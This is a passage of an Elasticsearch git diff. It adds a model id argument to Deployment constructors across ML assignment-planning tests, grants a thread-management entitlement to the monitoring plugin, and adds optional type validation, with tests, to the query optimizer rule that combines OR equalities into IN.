ByteSizeValue.ofMb(150).getBytes() ); Deployment deployment3 = new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -1048,6 +1183,7 @@ public static List createDeploymentsFromPlan(AssignmentPlan plan) { deployments.add( new Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -1116,6 +1252,7 @@ public static Deployment randomModel(String idSuffix) { // randomly choose between old and new memory fields format if (randomBoolean()) { return new Deployment( + "m_" + idSuffix, "m_" + idSuffix, randomLongBetween(ByteSizeValue.ofMb(100).getBytes(), ByteSizeValue.ofGb(10).getBytes()), randomIntBetween(1, 32), @@ -1128,6 +1265,7 @@ public static Deployment randomModel(String idSuffix) { ); } else { return new Deployment( + "m_" + idSuffix, "m_" + idSuffix, randomLongBetween(ByteSizeValue.ofMb(100).getBytes(), ByteSizeValue.ofGb(1).getBytes()), randomIntBetween(1, 32), @@ -1165,7 +1303,7 @@ private void runTooManyNodesAndDeployments(int nodesSize, int modelsSize) { } List deployments = new ArrayList<>(); for (int i = 0; i < modelsSize; i++) { - deployments.add(new Deployment("m_" + i, ByteSizeValue.ofMb(200).getBytes(), 2, 1, Map.of(), 0, null, 0, 0)); + deployments.add(new Deployment("m_" + i, "m_" + i, ByteSizeValue.ofMb(200).getBytes(), 2, 1, Map.of(), 0, null, 0, 0)); } // Check plan is computed without OOM exception diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java index 7499470cc8d6f..d22394ec86a77 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java @@ -25,8 +25,8 @@ public class PreserveAllAllocationsTests extends ESTestCase { public void testGivenNoPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); PreserveAllAllocations preserveAllAllocations = new PreserveAllAllocations( List.of(node1, node2), List.of(deployment1, deployment2) @@ -39,6 +39,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(640).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(640).getBytes(), 8); Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -50,6 +51,7 @@ public void testGivenPreviousAssignments() { 0 ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -122,6 +124,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment1 = new 
AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -133,6 +136,7 @@ public void testGivenPreviousAssignments() { ByteSizeValue.ofMb(10).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -208,7 +212,7 @@ public void testGivenPreviousAssignments() { public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments() { Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); + Deployment deployment = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); PreserveAllAllocations preserveAllAllocations = new PreserveAllAllocations(List.of(node), List.of(deployment)); AssignmentPlan plan = AssignmentPlan.builder(List.of(node), List.of(deployment)).build(); diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java index bc95fb1e0339e..6f340900276ff 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java @@ -26,8 +26,30 @@ public class PreserveOneAllocationTests extends ESTestCase { public void testGivenNoPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); - Deployment deployment1 = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - AssignmentPlan.Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 2, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(30).getBytes(), + 2, + 4, + Map.of(), + 0, + null, + 0, + 0 + ); PreserveOneAllocation preserveOneAllocation = new PreserveOneAllocation(List.of(node1, node2), List.of(deployment1, deployment2)); List nodesPreservingAllocations = preserveOneAllocation.nodesPreservingAllocations(); @@ -42,8 +64,9 @@ public void testGivenPreviousAssignments() { // old memory format Node node1 = new Node("n_1", ByteSizeValue.ofMb(640).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(640).getBytes(), 8); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of("n_1", 1), 1, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of("n_1", 1), 1, null, 0, 0); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -121,6 +144,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -132,6 +156,7 @@ public void testGivenPreviousAssignments() { ByteSizeValue.ofMb(10).getBytes() ); Deployment 
deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -211,7 +236,7 @@ public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments { // old memory format Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); + Deployment deployment = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); PreserveOneAllocation preserveOneAllocation = new PreserveOneAllocation(List.of(node), List.of(deployment)); AssignmentPlan plan = AssignmentPlan.builder(List.of(node), List.of(deployment)).build(); @@ -227,6 +252,7 @@ public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments // new memory format Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java index 7005ad959577b..ea23bfde0d848 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java @@ -36,7 +36,7 @@ public class ZoneAwareAssignmentPlannerTests extends ESTestCase { public void testGivenOneModel_OneNode_OneZone_DoesNotFit() { Node node = new Node("n_1", 100, 1); - AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment("m_1", 100, 1, 2, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment("m_1", "m_1", 100, 1, 2, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new ZoneAwareAssignmentPlanner(Map.of(List.of(), List.of(node)), List.of(deployment)).computePlan(); @@ -46,6 +46,7 @@ public void testGivenOneModel_OneNode_OneZone_DoesNotFit() { public void testGivenOneModel_OneNode_OneZone_FullyFits() { Node node = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -65,6 +66,7 @@ public void testGivenOneModel_OneNode_OneZone_FullyFits() { public void testGivenOneModel_OneNode_OneZone_PartiallyFits() { Node node = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 5); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -87,6 +89,7 @@ public void testGivenOneModelWithSingleAllocation_OneNode_TwoZones() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -115,6 +118,7 @@ public void testGivenOneModel_OneNodePerZone_TwoZones_FullyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -142,6 +146,7 @@ public void 
testGivenOneModel_OneLargeNodePerZone_TwoZones_FullyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofGb(16).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofGb(16).getBytes(), 8); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 4, @@ -169,6 +174,7 @@ public void testGivenOneModel_OneNodePerZone_TwoZones_PartiallyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -200,9 +206,9 @@ public void testGivenThreeDeployments_TwoNodesPerZone_ThreeZones_FullyFit() { Node node4 = new Node("n_4", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node5 = new Node("n_5", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node6 = new Node("n_6", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 6, 2, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(30).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 6, 2, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(30).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); Map, List> nodesByZone = Map.of( List.of("z_1"), @@ -248,8 +254,8 @@ public void testGivenTwoDeploymentsWithSingleAllocation_OneNode_ThreeZones() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node3 = new Node("n_3", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new ZoneAwareAssignmentPlanner( Map.of(List.of("z1"), List.of(node1), List.of("z2"), List.of(node2), List.of("z3"), List.of(node3)), @@ -282,6 +288,7 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode previousModelsPlusNew.add( new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -303,9 +310,9 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode public void testGivenClusterResize_GivenOneZone_ShouldAllocateEachModelAtLeastOnce() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(2580).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new 
Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new ZoneAwareAssignmentPlanner(Map.of(List.of(), List.of(node1, node2)), List.of(deployment1)) diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java index 4473919130c83..ee966ec951826 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java @@ -169,9 +169,9 @@ protected Collection> getMockPlugins() { } @Before - public void ensureTemplatesArePresent() throws Exception { + public void ensureTemplatesArePresent() { if (cluster().size() > 0) { - awaitClusterState(logger, MachineLearning::criticalTemplatesInstalled); + awaitClusterState(MachineLearning::criticalTemplatesInstalled); } } diff --git a/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml b/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml index 27ff2988cdcbe..ba7219af73c42 100644 --- a/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml +++ b/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml @@ -1,5 +1,6 @@ ALL-UNNAMED: - set_https_connection_properties # potentially required by apache.httpcomponents + - manage_threads # For org.elasticsearch.client.snif.Sniffer # the original policy has java.net.SocketPermission "*", "accept,connect" # but a comment stating it was "needed for multiple server implementations used in tests" # TODO: this is likely not needed, but including here to be on the safe side until diff --git a/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java b/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java index 2d51303b1d939..c5bc29043114f 100644 --- a/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java +++ b/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java @@ -98,7 +98,7 @@ public void testMultipleNodes() throws Exception { }); } - private void waitForMonitoringIndices() throws Exception { + private void waitForMonitoringIndices() { final var indexNameExpressionResolver = internalCluster().getCurrentMasterNodeInstance(IndexNameExpressionResolver.class); final var indicesOptions = IndicesOptions.builder() .wildcardOptions(IndicesOptions.WildcardOptions.builder().allowEmptyExpressions(true)) diff --git a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java index f12f8edb71795..0398288960dc1 100644 --- a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java +++ 
b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java @@ -177,6 +177,10 @@ protected TypeResolution resolveType() { return super.resolveType(); } + public TypeResolution validateInTypes() { + return resolveType(); + } + @Override public int hashCode() { return Objects.hash(value, list); diff --git a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java index 7625cbf3a56e5..a5e1d3bdbe620 100644 --- a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java +++ b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java @@ -1203,8 +1203,8 @@ private static boolean notEqualsIsRemovableFromConjunction(NotEquals notEquals, * 2. a == 1 OR a IN (2) becomes a IN (1, 2) * 3. a IN (1) OR a IN (2) becomes a IN (1, 2) * - * This rule does NOT check for type compatibility as that phase has been - * already be verified in the analyzer. + * By default (see {@link #shouldValidateIn()}), this rule does NOT check for type compatibility as that phase has + * already been verified in the analyzer, but this behavior can be changed by subclasses. */ public static class CombineDisjunctionsToIn extends OptimizerExpressionRule { public CombineDisjunctionsToIn() { @@ -1214,18 +1214,24 @@ public CombineDisjunctionsToIn() { @Override protected Expression rule(Or or) { Expression e = or; - // look only at equals and In + // look only at Equals and In List exps = splitOr(e); Map> found = new LinkedHashMap<>(); + Map> originalOrs = new LinkedHashMap<>(); ZoneId zoneId = null; List ors = new LinkedList<>(); for (Expression exp : exps) { if (exp instanceof Equals eq) { - // consider only equals against foldables + // consider only Equals against foldables if (eq.right().foldable()) { found.computeIfAbsent(eq.left(), k -> new LinkedHashSet<>()).add(eq.right()); + if (shouldValidateIn()) { + // in case there is an optimized In being built and its validation fails, rebuild the original ORs + // so, keep around the original Expressions + originalOrs.computeIfAbsent(eq.left(), k -> new ArrayList<>()).add(eq); + } } else { ors.add(exp); } @@ -1234,6 +1240,11 @@ protected Expression rule(Or or) { } } else if (exp instanceof In in) { found.computeIfAbsent(in.value(), k -> new LinkedHashSet<>()).addAll(in.list()); + if (shouldValidateIn()) { + // in case there is an optimized In being built and its validation fails, rebuild the original ORs + // so, keep around the original Expressions + originalOrs.computeIfAbsent(in.value(), k -> new ArrayList<>()).add(in); + } if (zoneId == null) { zoneId = in.zoneId(); } @@ -1243,11 +1254,31 @@ protected Expression rule(Or or) { } if (found.isEmpty() == false) { - // combine equals alongside the existing ors + // combine Equals alongside the existing ORs final ZoneId finalZoneId = zoneId; - found.forEach( - (k, v) -> { ors.add(v.size() == 1 ? createEquals(k, v, finalZoneId) : createIn(k, new ArrayList<>(v), finalZoneId)); } - ); + found.forEach((k, v) -> { + if (v.size() == 1) { + ors.add(createEquals(k, v.iterator().next(), finalZoneId)); + } else { + In in = createIn(k, new ArrayList<>(v), finalZoneId); + // IN has its own particularities when it comes to type resolution and not all implementations + // double check the validity of an internally created IN (like the one created here). 
EQL is one where the IN + // implementation is like this; the mechanism here has been specifically created for it + if (shouldValidateIn()) { + Expression.TypeResolution resolution = in.validateInTypes(); + if (resolution.unresolved()) { + // if the internally created In is not valid, fall back to the original ORs + assert originalOrs.containsKey(k); + assert originalOrs.get(k).isEmpty() == false; + ors.add(combineOr(originalOrs.get(k))); + } else { + ors.add(in); + } + } else { + ors.add(in); + } + } + }); Expression combineOr = combineOr(ors); // check the result semantically since the result might be different in order @@ -1261,13 +1292,17 @@ protected Expression rule(Or or) { return e; } - protected Equals createEquals(Expression k, Set v, ZoneId finalZoneId) { - return new Equals(k.source(), k, v.iterator().next(), finalZoneId); - } - protected In createIn(Expression key, List values, ZoneId zoneId) { return new In(key.source(), key, values, zoneId); } + + protected boolean shouldValidateIn() { + return false; + } + + private Equals createEquals(Expression key, Expression value, ZoneId finalZoneId) { + return new Equals(key.source(), key, value, finalZoneId); + } } public static class PushDownAndCombineFilters extends OptimizerRule { diff --git a/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java b/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java index bc7e0b2a93bf5..9e60a60c4c3d3 100644 --- a/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java +++ b/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java @@ -66,6 +66,8 @@ import java.time.ZoneId; import java.util.Collections; import java.util.List; +import java.util.Set; +import java.util.function.Consumer; import static java.util.Arrays.asList; import static java.util.Collections.emptyList; @@ -105,6 +107,9 @@ public class OptimizerRulesTests extends ESTestCase { private static final Literal FOUR = L(4); private static final Literal FIVE = L(5); private static final Literal SIX = L(6); + private static final Literal TEXT_A = L("A"); + private static final Literal TEXT_B = L("B"); + private static final Literal TEXT_C = L("C"); public static class DummyBooleanExpression extends Expression { @@ -1491,48 +1496,71 @@ public void testExactMatchRLike() throws Exception { // // CombineDisjunction in Equals // + + // CombineDisjunctionsToIn with shouldValidateIn as true + private final class ValidateableCombineDisjunctionsToIn extends CombineDisjunctionsToIn { + @Override + protected boolean shouldValidateIn() { + return true; + } + } + + private void assertCombineDisjunctionsToIn(Consumer tester) { + for (CombineDisjunctionsToIn rule : Set.of(new CombineDisjunctionsToIn(), new ValidateableCombineDisjunctionsToIn())) { + tester.accept(rule); + } + } + public void testTwoEqualsWithOr() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), equalsOf(fa, TWO)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testTwoEqualsWithSameValue() throws Exception { FieldAttribute fa = 
getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), equalsOf(fa, ONE)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(Equals.class, e.getClass()); - Equals eq = (Equals) e; - assertEquals(fa, eq.left()); - assertEquals(ONE, eq.right()); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(Equals.class, e.getClass()); + Equals eq = (Equals) e; + assertEquals(fa, eq.left()); + assertEquals(ONE, eq.right()); + }); } public void testOneEqualsOneIn() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), new In(EMPTY, fa, singletonList(TWO))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testOneEqualsOneInWithSameValue() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), new In(EMPTY, fa, asList(ONE, TWO))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testSingleValueInToEquals() throws Exception { @@ -1540,8 +1568,10 @@ public void testSingleValueInToEquals() throws Exception { Equals equals = equalsOf(fa, ONE); Or or = new Or(EMPTY, equals, new In(EMPTY, fa, singletonList(ONE))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(equals, e); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(equals, e); + }); } public void testEqualsBehindAnd() throws Exception { @@ -1549,9 +1579,11 @@ public void testEqualsBehindAnd() throws Exception { And and = new And(EMPTY, equalsOf(fa, ONE), equalsOf(fa, TWO)); Filter dummy = new Filter(EMPTY, relation(), and); - LogicalPlan transformed = new CombineDisjunctionsToIn().apply(dummy); - assertSame(dummy, transformed); - assertEquals(and, ((Filter) transformed).condition()); + assertCombineDisjunctionsToIn((rule) -> { + LogicalPlan transformed = rule.apply(dummy); + assertSame(dummy, transformed); + assertEquals(and, ((Filter) transformed).condition()); + }); } public void testTwoEqualsDifferentFields() throws Exception { @@ -1559,8 +1591,10 @@ public void testTwoEqualsDifferentFields() throws Exception { FieldAttribute fieldTwo = TestUtils.getFieldAttribute("TWO"); Or or = new Or(EMPTY, equalsOf(fieldOne, ONE), equalsOf(fieldTwo, TWO)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(or, e); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(or, e); + }); } public void testMultipleIn() throws Exception { @@ -1568,11 +1602,13 @@ public void testMultipleIn() throws Exception { Or firstOr = new Or(EMPTY, new In(EMPTY, fa, singletonList(ONE)), new In(EMPTY, fa, singletonList(TWO))); Or secondOr = new Or(EMPTY, firstOr, new In(EMPTY, fa, singletonList(THREE))); - Expression e = new CombineDisjunctionsToIn().rule(secondOr); - 
assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO, THREE)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(secondOr); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO, THREE)); + }); } public void testOrWithNonCombinableExpressions() throws Exception { @@ -1580,14 +1616,159 @@ public void testOrWithNonCombinableExpressions() throws Exception { Or firstOr = new Or(EMPTY, new In(EMPTY, fa, singletonList(ONE)), lessThanOf(fa, TWO)); Or secondOr = new Or(EMPTY, firstOr, new In(EMPTY, fa, singletonList(THREE))); - Expression e = new CombineDisjunctionsToIn().rule(secondOr); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(secondOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(or.left(), firstOr.right()); + assertEquals(In.class, or.right().getClass()); + In in = (In) or.right(); + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, THREE)); + }); + } + + public void testDontCombineSimpleDifferentTypes() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineDifferentTypes() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + // See https://github.com/elastic/elasticsearch/issues/118621 + public void testDontCombineStringTypesForIPField() throws Exception { + FieldAttribute fa = TestUtils.getFieldAttribute("ip", DataTypes.IP); + + Or or = new Or(EMPTY, new 